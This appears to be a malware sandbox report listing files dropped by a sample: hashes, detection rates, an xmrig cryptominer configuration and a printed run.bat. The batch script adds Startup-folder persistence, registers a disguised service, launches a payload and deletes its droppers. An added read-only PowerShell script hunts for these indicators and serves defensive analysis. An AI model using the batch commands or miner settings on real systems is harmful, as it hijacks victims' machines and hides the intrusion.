                                                                                                                                                                                                  SSDEEP:6144:OI6VyDGb+HiFr4kchE18dkuCj7jLwcYBQkMH9O1BNI/H9O1BNIgqH9O1BNIVH9Oa:OIJDGb+Hiu9hE18dkxfCMo7I/o7Igqok
                                                                                                                                                                                                  MD5:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  SHA1:8AB2B0DDC897603344DE8F1D4CC01AF118A0C543
                                                                                                                                                                                                  SHA-256:644C9745D1D2F679DB73FCB717DD37E180E19D5B0FC74575E4CEFE4F543F2768
                                                                                                                                                                                                  SHA-512:C30D46781B17C4BB0610D3AF4B5ACC223394D02F9FBB1FBB55811AE2EFE49FD29A7E9626737C4B24194C73C58FE1B577A858559A7E58D93C3660AC680F19EAF8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"1P.C_..C_..C_..;...C_..;...C_...$..C_..C^.YC_..;...C_......C_..;...C_.Rich.C_.........................PE..d...]..Y..........#......D...l................@............................. ..........................................................................h....P..."...................................................................`.. ............................text...4B.......D.................. ..`.rdata.......`.......H..............@..@.data...dC......."..................@....pdata..."...P...$..................@..@.rsrc................"..............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):371200
                                                                                                                                                                                                  Entropy (8bit):6.048766722102581
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:8mCYYQQf7AtHFFrZPzGa+oh8PXDtkRrCK1vHkk:8zYKMzv+oiPRkh
                                                                                                                                                                                                  MD5:39ADB356036E91008843B83EFB61131D
                                                                                                                                                                                                  SHA1:59A38A196A2AA4C90100B1B8CC806E5582E0D4DE
                                                                                                                                                                                                  SHA-256:1CF2BDB1CDD34BB50D60F21B8208041913747B8DECA5F26AA187D2E8C0E9A105
                                                                                                                                                                                                  SHA-512:E606B15EE26D78B16851EC955A6C80759919937AB19C9B7B69D52747D0170524EE595F7FF15D881A412B45865E92439DA9F3E5DCEEE004529BBF186A8510264A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ui.1...1...1...%c..;...%c.."...%c......c}.. ...c}..;...c}..a...%c..2...1........}..0....}D.0...1.,.0....}..0...Rich1...........................PE..d....@.e.........."......N...t...... l.........@..........................................`.................................................Lq..(................ ..............(....8...............................8..8............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data... -...........n..............@....pdata... ......."..................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6063
                                                                                                                                                                                                  Entropy (8bit):4.010190835138922
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CtWTGyHTrTb1DoCIjYkL6fuLujuAuHutjQHhjQHcDkF9RqDp:LhbBoCIjYkL0IujuAuHutjshjscDkFQ
                                                                                                                                                                                                  MD5:4B87D69D4C9A02A8217E2CC250269A1E
                                                                                                                                                                                                  SHA1:D3DAE3E28BD095D503048F4CED289AEB8B8DCFD4
                                                                                                                                                                                                  SHA-256:BD6ACE239D1619D5498652706DA2A3E42F31C6C4DB452E6751900E34B930D212
                                                                                                                                                                                                  SHA-512:1F79D5E5C4AE506617E583AB3E3E55054864615E5A5E3737FB272287E907D35FD45A4D1D81634C404864A0896FAD4635A0975F371A971250811BC71D6467E249
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Tasks\config.json, Author: Joe Security
                                                                                                                                                                                                   Preview (newlines restored; the report truncates the file after "cn-heavy":):
                                                                                                                                                                                                   {
                                                                                                                                                                                                       "api": {
                                                                                                                                                                                                           "id": null,
                                                                                                                                                                                                           "worker-id": null
                                                                                                                                                                                                       },
                                                                                                                                                                                                       "http": {
                                                                                                                                                                                                           "enabled": false,
                                                                                                                                                                                                           "host": "127.0.0.1",
                                                                                                                                                                                                           "port": 0,
                                                                                                                                                                                                           "access-token": null,
                                                                                                                                                                                                           "restricted": true
                                                                                                                                                                                                       },
                                                                                                                                                                                                       "autosave": true,
                                                                                                                                                                                                       "background": false,
                                                                                                                                                                                                       "colors": true,
                                                                                                                                                                                                       "title": true,
                                                                                                                                                                                                       "randomx": {
                                                                                                                                                                                                           "init": -1,
                                                                                                                                                                                                           "init-avx2": -1,
                                                                                                                                                                                                           "mode": "auto",
                                                                                                                                                                                                           "1gb-pages": false,
                                                                                                                                                                                                           "rdmsr": true,
                                                                                                                                                                                                           "wrmsr": true,
                                                                                                                                                                                                           "cache_qos": false,
                                                                                                                                                                                                           "numa": true,
                                                                                                                                                                                                           "scratchpad_prefetch_mode": 1
                                                                                                                                                                                                       },
                                                                                                                                                                                                       "cpu": {
                                                                                                                                                                                                           "enabled": true,
                                                                                                                                                                                                           "huge-pages": true,
                                                                                                                                                                                                           "huge-pages-jit": false,
                                                                                                                                                                                                           "hw-aes": null,
                                                                                                                                                                                                           "priority": null,
                                                                                                                                                                                                           "max-cpu-usage": null,
                                                                                                                                                                                                           "memory-pool": false,
                                                                                                                                                                                                           "yield": true,
                                                                                                                                                                                                           "force-autoconfig": false,
                                                                                                                                                                                                           "max-threads-hint": 50,
                                                                                                                                                                                                           "asm": true,
                                                                                                                                                                                                           "argon2-impl": null,
                                                                                                                                                                                                           "argon2": [0],
                                                                                                                                                                                                           "cn": [
                                                                                                                                                                                                               [1, 0]
                                                                                                                                                                                                           ],
                                                                                                                                                                                                           "cn-heavy":
                                                                                                                                                                                                  Process:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):706
                                                                                                                                                                                                  Entropy (8bit):5.076298278563438
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:sp+bOAraVM1t2c/DgfoCE3ot0JUyqfoCE3tt2sitE3kwEeRgh76AN1yMP6:sp+r2VM/Uf13t0Uf1Etlit0Eey1ZP6
                                                                                                                                                                                                  MD5:583985C24053B8EC1AF7F56D6641EF5D
                                                                                                                                                                                                  SHA1:F3663F96C00B6117620A5B932B220A5B71099606
                                                                                                                                                                                                  SHA-256:617C9DE31DDC54DF3A549858B8BD303E17DB7152FA0A2F8F9AC3C2BACECB3AFE
                                                                                                                                                                                                  SHA-512:9CFCF465AA9DBC960884013FFF41F5264E82A86C6968333CAEB3CA06C0D5E413F58BA0B26BA520EFFF755FEFB71398DC0810E8F935CAD6A74BCAA18554FB326D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                   Preview (CRLF line breaks restored; the script is the run.bat it deletes in its own cleanup step):
                                                                                                                                                                                                   echo off
                                                                                                                                                                                                   copy "c:\windows\tasks\MicrosoftPrt.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
                                                                                                                                                                                                   cd C:\windows\tasks
                                                                                                                                                                                                   TIMEOUT /T 1 /NOBREAK
                                                                                                                                                                                                   start "" "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
                                                                                                                                                                                                   TIMEOUT /T 1 /NOBREAK
                                                                                                                                                                                                   start "" "C:\windows\tasks\wmiic" start WMService
                                                                                                                                                                                                   TIMEOUT /T 2 /NOBREAK
                                                                                                                                                                                                   net start WMService
                                                                                                                                                                                                   start "" "C:\windows\tasks\1.exe"
                                                                                                                                                                                                   
                                                                                                                                                                                                   del /f C:\windows\tasks\run.bat
                                                                                                                                                                                                   del /f C:\programdata\migrate.exe
                                                                                                                                                                                                   del /f C:\programdata\mig.exe
                                                                                                                                                                                                   del /f C:\programdata\mig.rdp.exe
                                                                                                                                                                                                   del /f C:\programdata\mig_rdp.exe
                                                                                                                                                                                                   del /f C:\users\mig_rdp.exe
                                                                                                                                                                                                   del /f C:\users\mig.rdp.exe
                                                                                                                                                                                                   del /f C:\users\mig.exe
                                                                                                                                                                                                   del /f C:\programdata\ru.bat
                                                                                                                                                                                                   del /f C:\programdata\st.bat
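The two text artefacts above, the Yara-flagged C:\Windows\Tasks\config.json and the run.bat that stages a Startup-folder copy, registers the WMService service and then deletes the droppers, give a responder a concrete hunt list. The PowerShell script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. Every file, directory and service name in it is taken from run.bat and the Yara hit. The `pools` key it reads from config.json is xmrig's documented location for the pool URL and wallet, which falls in the part of the file the preview truncates, so reading it is an assumption about the full file rather than something the report shows.

```powershell
# Added hunt script (not from the report). Run from an elevated PowerShell on a
# host suspected of having executed this sample; read-only, it changes nothing.

# Paths named in run.bat (copy target, service binary, launched executables)
# plus the config.json that the Yara rule flagged as an xmrig configuration.
$TasksDir    = 'C:\Windows\Tasks'
$TaskFiles   = @('run.bat', 'config.json', 'MicrosoftPrt.exe', 'wmiic.exe',
                 'IntelConfigService.exe', '1.exe', 'MSTask.exe')
$StartupCopy = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftPrt.exe'
$Droppers    = @("$env:ProgramData\migrate.exe", "$env:ProgramData\mig.exe",
                 "$env:ProgramData\mig.rdp.exe", "$env:ProgramData\mig_rdp.exe",
                 "$env:ProgramData\ru.bat", "$env:ProgramData\st.bat",
                 'C:\Users\mig_rdp.exe', 'C:\Users\mig.rdp.exe', 'C:\Users\mig.exe')

$Findings = [System.Collections.Generic.List[string]]::new()

# 1. Executables and config staged in C:\Windows\Tasks, a directory that should
#    not contain executables at all. Hash anything found for later comparison
#    with the SHA-256 values listed in the report.
foreach ($name in $TaskFiles) {
    $p = Join-Path $TasksDir $name
    if (Test-Path -LiteralPath $p) {
        $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $Findings.Add("staged file: $p sha256=$h")
    }
}

# 2. Startup-folder persistence created by the copy command in run.bat.
if (Test-Path -LiteralPath $StartupCopy) {
    $Findings.Add("startup persistence: $StartupCopy")
}

# 3. The service registered by "wmiic.exe install WMService IntelConfigService.exe"
#    and started with "net start WMService".
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='WMService'"
if ($svc) {
    $Findings.Add("service: WMService state=$($svc.State) path=$($svc.PathName)")
}

# 4. Droppers that run.bat deletes at the end. If any is still on disk the
#    chain aborted part-way, which is worth recording in the timeline.
foreach ($p in $Droppers) {
    if (Test-Path -LiteralPath $p) { $Findings.Add("dropper still on disk: $p") }
}

# 5. Anything currently executing out of C:\Windows\Tasks.
Get-CimInstance -ClassName Win32_Process |
    Where-Object { $_.ExecutablePath -like "$TasksDir\*" } |
    ForEach-Object { $Findings.Add("running from Tasks: pid=$($_.ProcessId) $($_.ExecutablePath)") }

# 6. Miner configuration. randomx.wrmsr, cpu.max-threads-hint and http.enabled
#    are visible in the report's preview of config.json; 'pools' is assumed
#    from xmrig's documented schema because the preview is cut off before it.
$cfgPath = Join-Path $TasksDir 'config.json'
if (Test-Path -LiteralPath $cfgPath) {
    try {
        $cfg = Get-Content -LiteralPath $cfgPath -Raw | ConvertFrom-Json
        $Findings.Add(("miner config: wrmsr={0} max-threads-hint={1} http-api={2}" -f
            $cfg.randomx.wrmsr, $cfg.cpu.'max-threads-hint', $cfg.http.enabled))
        foreach ($pool in @($cfg.pools)) {
            if ($pool.url) { $Findings.Add("pool: $($pool.url) user=$($pool.user)") }
        }
    } catch {
        $Findings.Add("miner config: present but unparseable ($($_.Exception.Message))")
    }
}

if ($Findings.Count -eq 0) { 'No indicators from this sample found.' }
else { $Findings | ForEach-Object { "[!] $_" } }
```

Two things to keep in mind when reading the output. The file names are trivially changed between builds, so treat a hit on the WMService service or on any executable under C:\Windows\Tasks as the durable signal, and the exact names as this build's values. Second, `"wrmsr": true` in the preview tells xmrig to apply MSR tweaks, which on Windows requires a kernel driver; that is consistent with the unsigned native-mode PE that migrate.exe drops earlier in this list, although the report does not identify that file, so check the service's PathName and the loaded-driver list rather than assuming which file it is.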
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89752
                                                                                                                                                                                                  Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
                                                                                                                                                                                                  MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                  SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                  SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                  SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.D.x.D.x.D..AD.x.D..=D.x.D.x.D.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx.QD.x.Dx..E.x.DRich.x.D........PE..d....}.Y.........." .........T...............................................`.......Y....`A........................................p...4............@.......0..(.... ...>...P..p.......8...........................@................................................text...$........................... ..`.rdata...6.......8..................@..@.data...0.... ......................@....pdata..(....0......................@..@.rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):84040
Entropy (8bit):6.41469022264903
Encrypted:false
SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):181248
Entropy (8bit):6.178135125133477
Encrypted:false
SSDEEP:3072:8pixG4j9Sfl+l1wYz6GQXuyLe//qaVnTOk0Dxl4l5S7QkSTLkKzdsR8LXnfQ:8pOYfl41w8pSe/7nTw74btkSTLLzdsOL
MD5:77B5D28B725596B08D4393786D98BD27
SHA1:E3F00478DE1D28BC7D2E9F0B552778BE3E32D43B
SHA-256:F7A00BA343D6F1EA8997D95B242FBBD70856EC2B98677D5F8B52921B8658369C
SHA-512:D44415D425F7423C3D68DF22B72687A2D0DA52966952E20D215553AA83DE1E7A5192EC918A3D570D6C2362EB5500B56B87E3FFBC0B768BFA064585AEA2A30E9D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):123464
Entropy (8bit):5.886703955852103
Encrypted:false
SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
SHA-256:9459D246DF7A3C638776305CF3683946BA8DB26A7DE90DF8B60E1BE0B27E53C4
SHA-512:229896DA389D78CBDF2168753ED7FCC72D8E0E62C6607A3766D6D47842C0ABD519AC4F5D46607B15E7BA785280F9D27B482954E931645337A152B8A54467C6A5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):45640
Entropy (8bit):5.996546047346997
Encrypted:false
SSDEEP:768:8skeCps0iszzPFrGE/CBAdIPGV03ju774xxIGsIx7WDG4yw:81eCpLzDBZ+AdIPmYju7OxIGsIxWyw
MD5:A6448BC5E5DA21A222DE164823ADD45C
SHA1:6C26EB949D7EB97D19E42559B2E3713D7629F2F9
SHA-256:3692FC8E70E6E29910032240080FC8109248CE9A996F0A70D69ACF1542FCA69A
SHA-512:A3833C7E1CF0E4D181AC4DE95C5DFA685CF528DC39010BF0AC82864953106213ECCFF70785021CCB05395B5CF0DCB89404394327CD7E69F820D14DFA6FBA8CBA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):252488
Entropy (8bit):6.080982550390949
Encrypted:false
SSDEEP:6144:bkHDwqjhhwYbOqQNEkT/4OQhJwAbHoqLNvka/gOFhUw6b4qCNxkV/3OdhAWwPbGE:bd7/IbtSKOt
MD5:37057C92F50391D0751F2C1D7AD25B02
SHA1:A43C6835B11621663FA251DA421BE58D143D2AFB
SHA-256:9442DC46829485670A6AC0C02EF83C54B401F1570D1D5D1D85C19C1587487764
SHA-512:953DC856AD00C3AEC6AEAB3AFA2DEB24211B5B791C184598A2573B444761DB2D4D770B8B807EBBA00EE18725FF83157EC5FA2E3591A7756EB718EBA282491C7C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):28232
Entropy (8bit):6.051366978773049
Encrypted:false
SSDEEP:384:bp/aC60HGTPk/ltSA/6rCbCnA/cEXEz65D1IGqUrnYPLxDG4y8xxzzI:bH60HGw/b/6rCb9iKD1IGqUrWDG4yCI
MD5:44B72E0AD8D1E1EC3D8722088B48C3C5
SHA1:E0F41BF85978DD8F5ABB0112C26322B72C0D7770
SHA-256:4AA1BBDE1621C49EDAB4376CF9A13C1AA00A9B0A9905D9640A2694EF92F77D5E
SHA-512:05853F93C6D79D8F9C96519CE4C195B9204DF1255B01329DEAA65E29BD3E988D41454CD305E2199404F587E855737879C330638F2F07BFF11388A49E67BA896C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):78920
Entropy (8bit):6.061178831576516
Encrypted:false
SSDEEP:1536:KzMe79sDb+eGm08Vr5lcDAB9/s+7+pkaOz3CkNA9y1IGVwCyMPbi:de79u8/GFmAB9/se+pROz3jN1IGVw+Pm
MD5:D6BAE4B430F349AB42553DC738699F0E
SHA1:7E5EFC958E189C117ECCEF39EC16EBF00E7645A9
SHA-256:587C4F3092B5F3E34F6B1E927ECC7127B3FE2F7FA84E8A3D0C41828583BD5CEF
SHA-512:A8F8FED5EA88E8177E291B708E44B763D105907E9F8C9E046C4EEBB8684A1778383D1FBA6A5FA863CA37C42FD58ED977E9BB3A6B12C5B8D9AB6EF44DE75E3D1E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Tasks\MSTask.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):117832
Entropy (8bit):6.052642675957794
Encrypted:false
SSDEEP:3072:x3xozhUCVgMUGSo5iY0nx2bsxSV3QilzQmxLZIG47HZ:p6zh72PGz0nxrmVG
MD5:8EE827F2FE931163F078ACDC97107B64
SHA1:149BB536F3492BC59BD7071A3DA7D1F974860641
SHA-256:EAEEFA6722C45E486F48A67BA18B4ABB3FF0C29E5B30C23445C29A4D0B1CD3E4
SHA-512:A6D24E72BF620EF695F08F5FFDE70EF93F42A3FA60F7C76EB0F521393C595717E05CCB7A61AE216C18FE41E95FB238D82637714CF5208EE8F1DD32AE405B5565
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0.u.0.u.0.u.9...6.u.b.t.2.u.b.p.<.u.b.q.8.u.b.v.2.u..t.6.u.U.t.7.u.0.t.C.u..x.2.u..u.1.u...1.u..w.1.u.Rich0.u.........PE..d.....].........." ................................................................K.....`..........................................S..d...4T..........................H...........`...T............................................................................text...Q........................... ..`.rdata.............................@..@.data...P4...........h..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):841697
                                                                                                                                                                                                  Entropy (8bit):5.484547317597865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:fhidp/tosQNRs54PK4IMEVw59bfCEA3TR32Q:fhidp/tosQNRs54PK4Ia96h
                                                                                                                                                                                                  MD5:E187FCE3F6D3F4BA450630147421A885
                                                                                                                                                                                                  SHA1:18241F2097F7D53CFB6B118FAE1F9CD31D169D07
                                                                                                                                                                                                  SHA-256:1F908E12FBA42AF4AD0ADE6FA7F1DBC617AFE7837271911056AF266D895E596A
                                                                                                                                                                                                  SHA-512:7837A3B28993422D067643EFE17C5F573DBD4C4B3E6D915E691E7557C259146A3FDDB104DA5306B63BE59A81446D1DFEA5317B5E62CBCE6A5AAA8DC700B42874
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):290282
                                                                                                                                                                                                  Entropy (8bit):6.048183244201235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:QW1H/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5Np:QWN/TRJLWURrI55MWavdF0L
                                                                                                                                                                                                  MD5:302B49C5F476C0AE35571430BB2E4AA0
                                                                                                                                                                                                  SHA1:35A7837A3F1B960807BF46B1C95EC22792262846
                                                                                                                                                                                                  SHA-256:CF9D37FA81407AFE11DCC0D70FE602561422AA2344708C324E4504DB8C6C5748
                                                                                                                                                                                                  SHA-512:1345AF52984B570B1FF223032575FEB36CDFB4F38E75E0BD3B998BC46E9C646F7AC5C583D23A70460219299B9C04875EF672BF5A0D614618731DF9B7A5637D0A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:pip.
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):197
                                                                                                                                                                                                  Entropy (8bit):4.61968998873571
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                  MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                  SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                  SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                  SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11360
                                                                                                                                                                                                  Entropy (8bit):4.426756947907149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                  MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                  SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                  SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                  SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                  Malicious:false
